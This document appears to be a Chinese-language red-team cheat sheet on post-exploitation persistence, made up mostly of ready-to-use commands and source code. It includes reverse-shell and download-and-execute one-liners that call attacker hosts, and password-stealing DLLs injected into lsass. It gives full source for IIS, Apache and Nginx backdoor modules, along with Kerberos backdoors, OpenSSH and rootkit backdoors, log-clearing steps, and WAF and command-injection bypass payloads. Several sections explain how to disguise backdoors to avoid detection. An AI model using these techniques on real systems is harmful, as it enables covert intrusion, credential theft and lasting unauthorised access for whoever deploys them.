Meterpreter>run persistence -X -i 10 -r 192.168.1.9 -p 4444-X系統啟動時運行-i每隔10秒嘗試連接服務端連接后門Msf>use exploit/multi/handlerMsf>set payload windows/meterpreter/reverse_tcpMsf>set lhost 192.168.1.1Msf>set lport 4444Msf>run
HookPasswordChangeNotify
使用VS2015開發環境,MFC設置為在靜態庫中使用MFC編譯工程,生成HookPasswordChange.dllhttps://github.com/clymb3r/PowerShell/blob/master/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1在代碼尾部添加如下代碼:>Invoke-ReflectivePEInjection -PEPath HookPasswordChange.dll -procname lsass并命名為HookPasswordChangeNotify.ps1上傳HookPasswordChangeNotify.ps1和HookPasswordChange.dll管理員權限執行>PowerShell.exe -ExecutionPolicy Bypass -File HookPasswordChangeNotify.ps1C:\Windows\Temp下可以找到passwords.txt&https://gitee.com/RichChigga/PasswordchangeNotify上傳HookPasswordChangeNotify.ps1和HookPasswordChange.dll 管理員權限執行:>PowerShell.exe -ExecutionPolicy Bypass -File HookPasswordChangeNotify.ps1在C:\Windows\System32 新建文件system.ini第一行是連接的ip 第二行是端口
NPPSpy記錄密碼
https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy/NPPSPy.c默認保存位置是C盤根目錄,可以修改重新編譯
將DLL放入system32文件夾內
執行ps1腳本自動添加注冊表
無需重啟
Password Filter DLL
https://github.com/3gstudent/PasswordFiltervisualstudio生成解決方案DLL放在%windir%\system32\下HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa下的Notification Packages,添加Win32Project3
>REG QUERY "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Notification Packages">REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Notification Packages" /t REG_MULTI_SZ /d "scecli\0rassfm\0Win32Project3" /f重啟之后只要修改用戶的密碼,即可記錄
文件默認在C盤根目錄,可在源碼中修改
WMIC事件訂閱
每隔30秒加載一次payload>wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="BotFilter82", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="select * FROM __InstanceModificationEvent WITHIN 30 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'">wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="BotConsumer23",CommandLineTemplate="遠程調用(powershell,regsvr32,mshta等)">wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"BotFilter82\"", Consumer="CommandLineEventConsumer.Name=\"BotConsumer23\""
重啟維持卸載后門>Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='BotFilter82'" | Remove-WmiObject -Verbose>Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='BotConsumer23'" | Remove-WmiObject -Verbose>Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%BotFilter82%'" | Remove-WmiObject -Verbose
WMI-Persistence
https://gitee.com/RichChigga/WMI-Persistencecobalt strike ->payload generator->powershell(use x64)
attack->文件下載,文件選擇payload generator的腳本,local uri為隨意文件
生成后地址替換進WMI-Persistence腳本內
# powershell -exec bypassPS > Import-Module .\WMI-Persistence.ps1PS > Install-Persistence
PS > Check-WMI 重啟后即可上線system權限(要等待4-6分鐘)
自定義上線
attack->文件下載,exe木馬指定為文件��。local uri為隨意文件,wmi.xsl放在web目錄
修改wmi.xsl
<?xml version='1.0'?><stylesheetxmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"xmlns:user="placeholder"version="1.0"><output method="text"/> <ms:script implements-prefix="user" language="JScript"> <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c certutil -urlcache -split -f http://192.168.0.107/load.jpg %temp%/load.exe & %temp%/load.exe & certutil.exe -urlcache -split -f http://192.168.0.107/load.jpg delete",0); ]]> </ms:script></stylesheet>
WMI-Persistence腳本修改payload地址為wmi.xsl$finalPayload=" wmic os get /FORMAT:`"$Payload`""
>powershell -exec bypassPS > Import-Module .\WMI-Persistence.ps1PS > Install-PersistencePS > Check-WMIPS > Remove-Persistence 刪除模塊重啟后即可上線
Invoke-Tasksbackdoor
>powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.103/Invoke-taskBackdoor.ps1');Invoke-Tasksbackdoor -method nccat -ip 192.168.0.103 -port 9999 -time 2"> powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.103/Invoke-taskBackdoor.ps1');Invoke-Tasksbackdoor -method msf -ip 192.168.0.103 -port 8081 -time 2"
Invoke-ADSBackdoor
使用ADS創建一個隱藏文件,創建一個計劃任務每隔一分鐘請求一次攻擊���。>powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Backdoors/Invoke-ADSBackdoor.ps1'); Invoke-ADSBackdoor -PayloadURL http://192.168.0.107/ps/Schtasks-Backdoor.ps1 -Arguments 'Invoke-Tasksbackdoor -method nccat -ip 192.168.0.107 -port 12138 -time 1'"
生成
>msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.107 LPORT=12138 -f powershell -o /var/www/html/ads
#use exploit/multi/handler
#set payload windows/x64/meterpreter/reverse_https
#run
ADS隱藏webshell
指定宿主文件,index.php是網頁正常文件>echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg<?php include(‘index.php:hidden.jpg’)?><?php$a="696E6465782E7068703"."A68696464656E2E6A7067";#hex編碼$b="a";include(PACK('H*',$$b))?>>echo 9527 > 1.txt:flag.txt>notepad 1.txt:flag.txt或不指定宿主文件>echo hide > :key.txt>cd ../>notepad test:key.txt上傳處繞過
| 上傳的文件名 | 服務器表面現象 | 生成的文件內容 |
|---|
| test.php:a.jpg | 生成test.php | 空 |
| test.php::$DATA | 生成test.php | |
| test.php::$INDEX_ALLOCATION | 生成test.php文件夾 | \ |
| test.php::$DATA\0.jpg | 生成0.jpg | |
ADS&JavaScript
創建一個txt文件,test.txt,隨便添加內容(實際的工具,即用戶要用的那個工具)�����。將程序寫入文件流(此處用calc.exe)>type calc.exe > test.txt:calc.exe使用mklink創建文件鏈接:>mklink config.txt test.txt:calc.exe創建readme.txt,文件內容隨便�����。設置為隱藏�。創建readme.js,內容如下:var objShell = new ActiveXObject("shell.application");objShell.ShellExecute("cmd.exe", "/c config.txt", "", "open", 0);objShell.ShellExecute("README.txt", "", "", "open", 1);執行readme.js,運行calc.exe ,打開readme.txt
Empire
LNK后門
EmpireEmpire> set Host http://192.168.1.150Empire> set Port 8080>launcher powershell Listener's Name生成后只使用Base64的代碼�。>powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-BackdoorLNK.ps1');Invoke-BackdoorLNK -LNKPath 'C:\Users\Administrator.DC\Desktop\Easy CHM.lnk' -EncScript Base64編碼"
清除后門>powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-BackdoorLNK.ps1');Invoke-BackdoorLNK -LNKPath 'C:\Users\Administrator.DC\Desktop\Easy CHM.lnk' -CleanUp"
WMI
Empire>powershell/persistence/elevated/wmi
注入SSP被動收集密碼
需高權限
Mimikatz
重啟失效>privilege::debug>misc::memssp鎖屏>rundll32.exe user32.dll,LockWorkStation
登錄的賬號密碼保存在C:\Windows\System32\mimilsa.log
重啟有效將mimikatz中的mimilib.dll放入system32目錄>reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages" 查看注冊表>reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ 添加mimilib
有賬號登錄密碼保存在C:\Windows\System32\kiwissp.log重啟也有效
Empire
復制mimilib.dll到system32文件夾中>shell copy mimilib.dll C:\Windows\System32\使用模塊>usemodule persistence/misc/install_ssp*>set Path C:\Users\Administrator\mimilib.dll
Powersploit
>Import-Module .\PowerSploit.psm1>Install-SSP -Path .\mimilib.dll
基于域策略文件權限后門
域的組策略和腳本存放在域控機的C:\Windows\SYSVOL\sysvol\zone.com\Policies目錄,域內機器定時訪問以更新策略域控機設置policies為everyone完全控制>cacls C:\Windows\SYSVOL\sysvol\zone.com\Policies /e /t /c /g "EveryOne":f
使用powerview查詢域內機對應策略文件PS> Get-NETGPO -ComputerName sub2k8.zone.com |fl gpcfilesyspath打開C:\Windows\SYSVOL\sysvol\zone.com\Policies\{id}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf末尾添加[Registry Values] MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskhost.exe\Debugger=1,c:\windows\system32\calc.exe [Version] signature="$CHICAGO$" Revision=1手動刷新策略>gpupdate /force劫持taskhost.exe,可替換c:\windows\system32\calc.exe為后門文件或語句�����。
Kerberoasting后門
當有setspn權限時,為域用戶添加一個SPN>setspn -U -A RDP/zone.com godadmin
域內任何主機可以使用Kerberoast 獲得TGShttps://github.com/malachitheninja/Invoke-Kerberoast
>Invoke-Kerberoast -AdminCount -OutputFormat Hashcat | select hash | ConvertTo-CSV -NoTypeInformation |Out-File xx.txt
或使用rubeus.exe
破解>hashcat -m 13100 -a 0 kerberos.txt wordlist.txt
S4U2Self后門
域控執行,尋找具備SPN且密碼永不過期的賬戶>Get-ADUser -Filter * -Properties ServicePrincipalName,PasswordNeverExpires| ? {($_.ServicePrincipalName -ne "") -and ($_.PasswordNeverExpires -eq $true)}
使用mimikatz的dcsync提取用戶hash>lsadump::dcsync /domain:zone.com /user:y
布置后門>Set-ADUser krbtgt -PrincipalsAllowedToDelegateToAccount 賬戶
布置完成后利用,登錄賬戶y觸發后門>Rubeus.exe s4u /user:y /aes256:{aes256} /domain:zone.com /msdsspn:krbtgt /impersonateuser:godadmin
注入票據,獲取域控的CIFS��、LDAP服務>Rubeus.exe asktgs /ticket:{} /service:cifs/dc.zone.com,ldap/dc.zone.com /ptt
受限委派后門
http://192.168.0.107/ps/nishang/ActiveDirectory/Add-ConstrainedDelegationBackdoor.ps1新增一個受限委派服務賬戶,或添加受限委派后門功能給一個已知賬戶密碼存在的服務賬戶����。需運行在域控制器上,本次演示的是新建后門賬戶,若是給已知賬戶密碼的服務賬戶添加功能,步驟一致�����。PS > Add-ConstrainedDelegationBackdoor -SamAccountName backdoor -Domain zone.com -AllowedToDelegateTo ldap/dc.zone.com密碼默認為Password@123!可以修改腳本中$Password參數修改密碼�。
https://github.com/samratashok/ADModule導入ADModule中的Microsoft.ActiveDirectory.Management.dll和Import-ActiveDirectory.ps1>Import-Module Microsoft.ActiveDirectory.Management.dll -Verbose>Import-Module Import-ActiveDirectory.ps1現以域內普通用戶y登錄一臺域內機器sub2k8,使用kekeo獲取TGTKekeo#tgt::ask /user:backdoor /domain:zone.com /password:Passowrd@123!
Kekeo#tgs::s4u /tgt:TGT_backdoor@ZONE.COM_krbtgt~zone.com@ZONE.COM.kirbi /user:godadmin@zone.com /service:ldap/dc.zone.com獲取以域管理身份訪問ldap的TGS
使用mimikatz寫入TGS票據mimikatz#kerberos::ptt C:\Users\y.ZONE\Desktop\kekeo\x64\TGS_godadmin@zone.com@ZONE.COM_ldap~dc.zone.com@ZONE.COM.kirbi
接下來就可以dcsync導出krbtgt的hash,通過krbtgt偽造黃金票據mimikatz#lsadump::dcsync /user:krbtgt /domain:zone.com
Skeleton Key萬能鑰匙
域控上使用mimikatz執行>privilege::debug>misc::skeleton
可以使用域內任何賬號以密碼mimikatz登錄任意域內主機使用Empire模塊>usemodule persistence/misc/skeleton_key*繞過LSA Protection>privilege::debug>!+>!processprotect /process:lsass.exe /remove>misc::skeleton
唯一IP訪問
>msfvenom -p windows/shell_hidden_bind_tcp LPORT=443 AHOST=192.168.0.107 -f exe > svchost.exe只有當107這臺機器連接時可獲得shell,其他機器不可以�����。
Linux cron后門
>msfvenom -p cmd/unix/reverse_bash LHOST=192.168.0.107 LPORT=12138 -f raw > /var/www/html/shell.sh(crontab -l;printf "*/1 * * * * /bin/bash /tmp/shell.sh;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -
#!bash(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/192.168.1.1/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -
Strace記錄ssh密碼
安裝strace#apt-get install strace#vi ~/.bashrc添加alias ssh='strace -o /tmp/.log -e read,write,connect -s 2048 ssh'
SSHD后門
>ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;執行后開啟31337端口,使用root任意密碼登錄>ssh root@192.168.1.1 -p 31337
進程注入
http://cymothoa.sourceforge.net/靶機>./cymothoa -p 進程PID -s 1 -y 端口攻擊機>nc -vv ip 端口
SSH wrapper后門
#cd /usr/sbin#mv sshd ../bin#echo '#!/usr/bin/perl' >sshd#echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd#echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd#chmod u+x sshd#/etc/init.d/sshd restart攻擊機執行>socat STDIO TCP4:192.168.0.110:22,sourceport=13377
SUID Shell
>cp /bin/bash /tmp/tmp>chmod u+s /tmp/tmp>/tmp/tmp -p
SSH公私鑰登錄
>vim /etc/ssh/sshd_conf取消以下注釋
>ssh-keygen生成復制/root/.ssh/id_rsa.pub文件到攻擊端的/root/.ssh/authorized_keys>ssh -i id_rsa targer@1.1.1.1
Reptile
https://github.com/f0rb1dd3n/Reptile安裝>apt install build-essential libncurses-dev linux-headers-$(uname -r)>git clone https://github.com/f0rb1dd3n/Reptile.git
Kbeast_rootkit
http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gzversion - 0 : 2.6.18 (RHEL/CentOS 5.x) 1 : 2.6.32 (Ubuntu 10.x) [default version]修改配置config.h安裝路徑�����、日志路徑�����、端口��、連接密碼��、連接用戶
./setup build攻擊機連接>telnet 192.168.1.1 13377
OpenSSH后門
下載http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gzhttp://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz備份配置文件>mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old>mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old安裝關聯文件centos>yum install -y openssl openssl-devel pam-devel zlib zlib-develUbuntu>apt-get install -y openssl libssl-dev libpam0g-dev>tar zxvf openssh-5.9p1.tar.gz>tar zxvf 0x06-openssh-5.9p1.patch.tar.gz>cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1/>cd openssh-5.9p1>patch <sshbd5.9p1.diff>vim includes.h
/tmp/ilog記錄登錄到本機的用戶密碼/tmp/olog記錄本機登錄其他機器的賬戶密碼日志文件前可以加個.隱藏起來SECRETPW是連接后門密碼查看當前版本>ssh -V
修改version.h改為當前版本
編譯安裝Centos7>./configure --prefix=/usr/ --sysconfdir=/etc/ssh/ --with-pam --with-kerberos5>make clean>make && make install>systemctl restart sshd.serviceubuntu>./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam>make clean>make&&make install重啟服務,修改文件日志>touch -r/etc/ssh/ssh_config.old /etc/ssh/ssh_config>touch -r/etc/ssh/sshd_config.old /etc/ssh/sshd_config
清除痕跡>export HISTFILE=/dev/null>export HISTSIZE=0>export HISTFILESIZE=0>sed -i 's/192.168.0.1/127.0.0.1/g' /root/.bash_history
IPTables端口復用
>iptables -t nat -N LETMEIN>iptables -t nat -A LETMEIN -p tcp -j REDIRECT --to-port 22# 開啟開關>iptables -A INPUT -p tcp -m string --string 'threathuntercoming' --algo bm -m recent --set --name letmein --rsource -j ACCEPT# 關閉開關>iptables -A INPUT -p tcp -m string --string 'threathunterleaving' --algo bm -m recent --name letmein --remove -j ACCEPT>iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN攻擊端:#開啟復用>echo threathuntercoming | socat - tcp:192.168.0.110:80#ssh使用80端口進行登錄ssh -p 80 root@192.168.0.110#關閉復用echo threathunterleaving | socat - tcp:192.168.0.110:80
文件處理
>chattr +I shell.sh
>vim .shell.sh
>attrib +s +h +r 1.txt
>touch -r 1.file 2.file 修改2file文件的時間跟1file時間相同
IIS_Bin_Backdoor
From:https://github.com/WBGlIl/IIS_backdoorIIS_backdoor_dll.dl放入 web 目錄的 bin 文件夾中配置 web.config 文件
<?xml version="1.0" encoding="UTF-8"?><configuration> <system.webServer> <modules> <add name="IIS_backdoor" type="IIS_backdoor_dll.IISModule" /> </modules> </system.webServer></configuration>
IIS_backdoor_shell.exe執行命令
使用IISBackdoor太明顯,容易被看出是后門,這里對后門改名
重新生成解決方案,dll放入bin目錄,web.config修改為
<?xml version="1.0" encoding="UTF-8"?><configuration> <system.webServer> <modules> <add name="UrlRoutingModule" type="UrlRoutingModule.IISModule" /> </modules> </system.webServer></configuration>
添加完之后會自動在模塊中注冊好
執行payload,msf生成raw格式payload,選擇shellcode選項,raw文件拖入即可>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f raw -o /var/www/html/1.raw
IIS_NETDLL_Spy
From:https://github.com/Ivan1ee/NetDLLSpy原作者提及三種方式,第一種編譯代碼為DLL新建aspx文件實例化后門類來執行命令,第二種是做httphandler映射可指定一個后綴執行命令保存文件在web服務器上,再讀取結果���。第三種是使用jsc.exe編譯js腳本生成dll,添加映射菜刀連接�����。這里根據原作者的代碼,進行了一下簡單的修改,修改后的功能為添加httphandler映射指定一個后綴執行命令顯示在頁面上,不用保存在服務器中再訪問���。代碼
using System;using System.Diagnostics;using System.IO;using System.Text;using System.Web;namespace IsapiModules{ public class Handler : IHttpHandler { public bool IsReusable { get { return false; } } public void ProcessRequest(HttpContext context) { string input = context.Request.Form["InternetInformationService"]; //command if (context.Request.Form["microsoft"] == "iis")//do command { this.cmdShell(input); } } public void cmdShell(string input) { Process process = new Process(); process.StartInfo.FileName = "cmd.exe"; process.StartInfo.RedirectStandardOutput = true; process.StartInfo.UseShellExecute = false; process.StartInfo.Arguments = "/c " + input; process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; process.Start(); StreamReader output = process.StandardOutput; String result = output.ReadToEnd(); output.Close(); output.Dispose(); HttpContext.Current.Response.Write(result); } }}
保存為隨意后綴,使用csc編譯��。>C:\Windows\Microsoft.NET\Framework\v2.50727\csc.exe /t:library /r:System.Web.dll -out:C:\inetpub\wwwroot\Bin\SystemIO.dll C:\inetpub\wwwroot\bin\code.cs
Web.config文件添加<system.webServer> <handlers> <add name="PageHandlerFactory-ISAPI-2.0-32" path="*.xxx" verb="*" type="IsapiModules.Handler" resourceType="Unspecified" requireAccess="script" preCondition="integratedMode" /> </handlers></system.webServer>
打開IIS管理器,可以看到處理映射管理器中已經添加了模塊���。
現在隨意訪問個xxx后綴的文件
帶參數訪問microsoft=iis&InternetInformationService=net user
第三種連接菜刀,這里也對代碼修改了一下���。
import System;import System.Web;import System.IO;package IsapiModule{ public class Handler implements IHttpHandler { function IHttpHandler.ProcessRequest(context : HttpContext) { context.Response.Write("404 Not Found") var I = context; var Request = I.Request; var Response = I.Response; var Server = I.Server; eval(context.Request["Internet"]); //pass } function get IHttpHandler.IsReusable() : Boolean{ return true} }}
使用jsc編譯>C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe /t:library -out:C:\inetpub\wwwroot\Bin\IsapiModule.Handler.dll C:\inetpub\wwwroot\bin\code.js
編輯web.config,添加映射,這里指定的后綴是.iis<system.webServer><modules runAllManagedModulesForAllRequests="true"/> <directoryBrowse enabled="true"/> <staticContent> <mimeMap fileExtension=".json" mimeType="application/json" /> </staticContent> <handlers> <add name="PageHandlerFactory-ISAPI-2.0-32-1" path="*.iis" verb="*" type="IsapiModule.Handler" preCondition="integratedMode"/> </handlers></system.webServer>已自動加入了映射?��,F在隨便訪問個iis后綴的文件�����。
可使用菜刀直接連接
IIS_RAID
From:https://github.com/0x09AL/IIS-Raid在vs2019下編譯在Functions.h中修改連接密碼,passfile是dump下來的密碼保存的位置,com_header是后門和服務器通信的請求頭����。
打開項目修改完你的密碼,直接ctrl+B生成解決方案即可(這里生成的是release版本)Dll傳到服務器,改個名字,執行添加模塊>C:\Windows\system32\inetsrv\APPCMD.EXE install module /name:IsapiDotNet /image:"c:\windows\system32\inetsrv\IsapiDotNet.dll" /add:true
在模塊中可以看到已經存在了
遠程連接>python3 iis_controller.py --url http://192.168.0.98 --password thisismykey執行命令的方式是>cmd +命令
Dump命令可以dump下來IIS站點的登錄的信息,保存在設置的位置��。Inject可以執行shellcodeCs/msf生成raw格式的shellcode>inject 位置
JAVA Web Backdoor
From:https://www.freebuf.com/articles/web/172753.htmlhttps://github.com/rebeyond/memShell當獲取一個webshell或bashshell權限時,下載后門執行注入進程形成無文件復活后門下載后解壓到任意web目錄
得到2個jar文件執行,password設置為你的密碼>java -jar inject.jar password
注入成功,在web任意頁面任意url執行命令http://192.168.0.121:8080/css/app.css?pass_the_world=password
可執行命令,反彈shell,上傳/下載文件,列目錄,讀文件,添加代理,連接菜刀
Tomcat JSP HideShell
From:https://mp.weixin.qq.com/s/7b3Fyu_K6ZRgKlp6RkdYoAhttps://github.com/QAX-A-Team/HideShell把自己的shell和hideshell傳入靶機,先訪問自己的shell,目的是為了讓 Tomcat 將它編譯,并生成 JspServletWrapper 保存在 JspRuntimeContext 中�。
再訪問hideshell.jsp,點擊hide你的shell���。
已經隱藏了
再訪問hideshell.jsp,可以看到隱藏后的shell的文件名��。
訪問看看
當然,也可以把hideshell自身隱藏了,那訪問它的方式就是hidden-hideshell.jsp
目錄里啥都沒了
此方式隱藏之后請求不會產生日志
那如果把shelltest文件夾刪掉權限還會在嗎?
是在的
Apache Module后門1
From:https://github.com/WangYihang/Apache-HTTP-Server-Module-Backdoor生成模板結構>apxs -g -n auth
編輯mod_auth.c文件
#include "httpd.h"#include "http_config.h"#include "http_protocol.h"#include "ap_config.h"#include <stdio.h>#include <stdlib.h>static int auth_handler(request_rec *r){ const apr_array_header_t *fields; int i; apr_table_entry_t *e = 0; char FLAG = 0; fields = apr_table_elts(r->headers_in); e = (apr_table_entry_t *) fields->elts; for(i = 0; i < fields->nelts; i++) { if(strcmp(e[i].key, "Authorizations") == 0){ FLAG = 1; break; } } if (FLAG){ char * command = e[i].val; FILE* fp = popen(command,"r"); char buffer[0x100] = {0}; int counter = 1; while(counter){ counter = fread(buffer, 1, sizeof(buffer), fp); ap_rwrite(buffer, counter, r); } pclose(fp); return DONE; } return DECLINED;}static void auth_register_hooks(apr_pool_t *p){ ap_hook_handler(auth_handler, NULL, NULL, APR_HOOK_MIDDLE);}module AP_MODULE_DECLARE_DATA auth_module = { STANDARD20_MODULE_STUFF, NULL, /* create per-dir config structures */ NULL, /* merge per-dir config structures */ NULL, /* create per-server config structures */ NULL, /* merge per-server config structures */ NULL, /* table of config file commands */ auth_register_hooks /* register hooks */};
編譯后重啟apache>apxs -i -a -c mod_auth.c && service apache2 restart
原文件接受的頭是backdoor太明顯,這里換成了Authorizations
或使用python來執行
#!/usr/bin/env python# -*- coding: utf-8 -*-import requestsimport sysdef exploit(host, port, command): headers = { "Authorizations": command } url = "http://%s:%d/" % (host, port) response = requests.get(url, headers=headers) content = response.content print contentdef main(): if len(sys.argv) != 3: print "Usage : " print "\tpython %s [HOST] [PORT]" % (sys.argv[0]) exit(1) host = sys.argv[1] port = int(sys.argv[2]) while True: command = raw_input("$ ") if command == "exit": break exploit(host, port, command)if __name__ == "__main__": main()
Apache Module后門2
From:https://github.com/VladRico/apache2_BackdoorMod.load文件傳入/etc/apache2/mods-available/目錄,.so文件傳入/usr/lib/apache2/modules/目錄啟動后門模塊,重啟apache>a2enmod backdoor&service apache2 restart
Cookie里添加字段password=backdoor訪問http://ip/ping返回如下圖說明后門正常允許
訪問http://ip/bind/12345 開啟正向連接,攻擊機執行nc ip 12345即可
訪問http://ip/revtty/192.168.0.107/12138 開啟反向連接,攻擊機109執行nc監聽12138即可
訪問http://ip/proxy/1337開啟socks代理
想要結束socks代理可執行>echo "imdonewithyou" |nc 192.168.0.111 1337
即可結束socks代理以上原作者的文件命名backdoor太明顯,可以自己修改文件重新編譯創建模板結構命名為phpmodev
修改cookie內容為迷惑字段Authorizations=PHPSESSIONID
Apache Module后門3
From: https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247491179&idx=1&sn=ab26fe36ac74f5b140e91279ae8018c7生成模板結構>apxs -g -n phpdevmod
編輯mod_phpdevmod.c文件編譯>make -e CC=x86_64-linux-gnu-g++
生成的.so文件在/.libs目錄下
將其復制到/usr/lib/apache2/modules/目錄修改/etc/apache2/mods-enabled/php7.0.load文件,添加如下LoadModule phpdevmod_module /usr/lib/apache2/modules/mod_phpdevmod.so<Location /qq.jpg> #可以設置為任何不存在的文件 setHandler phpdevmod</Location>
需重啟apache服務訪問后門方式http://ip/qq.jpg?命令的url編碼直接訪問后門文件
636174202F6574632F706173737764為cat /etc/passwd的url編碼
Nginx Lua后門
From:https://github.com/netxfly/nginx_lua_securityhttps://github.com/Y4er/Y4er.com/blob/251d88d8a3cf21e9bafe15c43d7900ffeacfa7ea/content/post/nginx-lua-backdoor.md后門利用的前提是獲取到root權限,nginx安裝有lua模塊����。在nginx.conf中http節處添加,指定lua腳本位置,以及nginx啟動時加載的腳本
在lua目錄/waf/中新建Init.lua,內容如下,require nginx表示加載nginx.lua中的模塊�。
/waf/目錄中新建nginx.lua實現執行命令,參數為waf��。
在nginx配置文件中加入location��。
效果:
PwnNginx
From:https://github.com/t57root/pwnginx解壓好后編譯客戶端>make
編輯nginx的源文件/src/core/nginx.c找到configure arguments:在后面添加--prefix=/usr/local/nginx\n指定的是nginx安裝的目錄
重新編譯nginx添加后門模塊>./configure --prefix=/usr/local/nginx/ --add-module=/tmp/pwnginx-master/module
>make
覆蓋新的nginx到原nginx目錄>cp -f objs/nginx /usr/local/nginx/sbin/nginx
重啟nginx>killall nginx&/usr/local/nginx/sbin/nginx連接>./pwnginx shell 目標機 nginx端口 密碼默認密碼是t57root,密碼的配置文件在pwnginx-master\module\config.h文件夾中,可在重新編譯nginx前修改密碼
此后門也可開啟socks隧道
滲透和紅隊tips
父進程破壞
命令explorer.exe / root與cmd.exe / c類似,只不過使用explorer會破壞進程樹,會創建新實例explorer.exe,使之成為新實例下的子進程
loT高頻率賬戶密碼
Bypass mod_security
Xss和注入bypass mod_security/*!50000%75%6e%69on*/ %73%65%6cect 1,2,3,4... –<marquee loop=1 width=0 onfinish=pr\u006fmpt(document.cookie)>Y000</marquee>/*!50000%75%6e%69on*/ %73%65%6cect 1,2,3,4,5—%75%6e%69on = union%73%65%6cect = select%75%6e%69 = uni = url encode%73%65%6c = sel = url encode
查找git和svn的字典
Top 25 重定向dorks
使用grep快速去除垃圾數據
curl http://host.xx/file.js | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*cat file | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*
已泄露的密碼整理出的字典
https://github.com/FlameOfIgnis/Pwdb-Public從網上泄露的10億條數據中整理出的�����。里面257,669,588被篩選為損壞的數據或測試賬戶�。10億個憑據可歸結為168,919,919密碼和393,386,953用戶名.平均密碼長度為9.4822個字符12.04%包含特殊字符,28.79%密碼僅是字母,26.16%僅是小寫,13.37%僅是數字,8.83%的密碼僅被發現一次與rockyou的對比,rockyou包含14,344,391個密碼,本字典與rockyou相差80%還有根據不同國家生成的小字典
命令注入Bypass
From: @shreyasrxcat /etc/passwdcat /e"t"c/pa"s"swdcat /'e'tc/pa's' swdcat /etc/pa??wdcat /etc/pa*wdcat /et' 'c/passw' 'dcat /et$()c/pa$()$swdcat /et${neko}c/pas${poi} swd*echo "dwssap/cte/ tac" | rev$(echo Y2FOIC9ldGMvcGFzc3dkCg== base64 -d)w\ho\am\i/\b\i\n/////s\hwho$@amixyz%0Acat%20/etc/passwdIFS=,;`cat<<<uname,-a`/???/??t /???/p??s??test=/ehhh/hmtc/pahhh/hmsswdcat ${test//hhh\/hm/}cat ${test//hh??hm/}cat /???/?????d{cat,/etc/passwd}
查詢是否存在heartbleed漏洞
cat list.txt | while read line ; do echo "QUIT" | openssl s_client -connect $line:443 2>&1 | grep 'server extension "heartbeat" (id=15)' || echo $line: safe; done
遠程解壓文件
pip install remotezip#列出遠程壓縮包文件內容remotezip -l http://site/bigfile.zip#解壓里面的文件remotezip "http://site/bigfile.zip" "file.txt"
Top25 ssrf dorks
使用SecurityTrails API查詢子域名
去https://securitytrails.com/申請個免費的APIcurl -s --request GET --url https://api.securitytrails.com/v1/domain/target.com/subdomains?apikey=API_KEY | jq '.subdomains[]' | sed 's/\"http://g' >test.txt 2>/dev/null && sed "s/$/.target.com/" test.txt | sed 's/ //g' && rm test.txt
郵件地址payload
XSStest+(<script>alert(0)</script>)@example.comtest@example(<script>alert(0)</script>).com"<script>alert(0)</script>"@example.comSSTI"<%= 7 * 7 %>"@example.comtest+(${{7*7}})@example.comSQL injection"' OR 1=1 -- '"@example.com"mail'); --"@example.comSSRFjohn.doe@abc123.dnslog.cnjohn.doe@[127.0.0.1]頭注入"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com"recipient@test.com>\r\nRCPT TO:<victim+"@test.com
Web server日志分析命令
